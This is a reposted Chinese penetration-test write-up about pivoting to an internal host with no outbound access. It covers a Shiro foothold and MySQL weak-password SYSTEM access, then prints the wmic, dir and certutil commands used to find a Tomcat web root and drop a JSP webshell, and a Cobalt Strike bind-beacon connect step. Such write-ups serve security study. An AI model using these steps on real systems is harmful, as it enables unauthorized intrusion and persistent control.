一次不出网上线cs实战案例
2022-7-26 10:23:19 Author: 黑白之道(查看原文) 阅读量:17 收藏

shiro打点获取10段服务器权限,在10段机器出网且已上线cs;172段不出网且反向不通10段,已通过mysql弱口令获取system权限,存在web服务。

思路:写入webshell,通过正向马上线cs。

getshell

通过web服务获取一个web目录下的文件名:stf-login-bg.jpg

获取所有盘符

wmic logicaldisk get caption,name

通过文件名获取web目录

dir /a /s /b d:\"stf-login-bg.jpg"

根据图片URL确定D:\apache-tomcat-7.0.73-windows-x64\apache-tomcat-7.0.73\webapps\ROOT\static\images\login\stf-login-bg.jpg为真实web路径,使用\可dir到此路径。

echo配合certutil写入webshell:

//base64编码shell.jspcertutil -encode shell.jsp jsp.txt 
//echo编码后的内容到web目录echo xxxx >D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt
//解码还原文件certutil -decode D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\123.jsp

上线cs

新建监听器

生成正向马

通过webshell上传到目标机器并执行,使用跳板机连接,上线cs。

connect 172.20.57.122 28888

文章来源:tide安全团队

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

多一个点在看多一条小鱼干


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650546311&idx=3&sn=51b1b742732995191283b242111d44c5&chksm=83bd4563b4cacc75d4f0fbb4ca4eca513471adc4bd3b2f2f59ebf7ea973d2ca46fbe00063b46#rd
如有侵权请联系:admin#unsafe.sh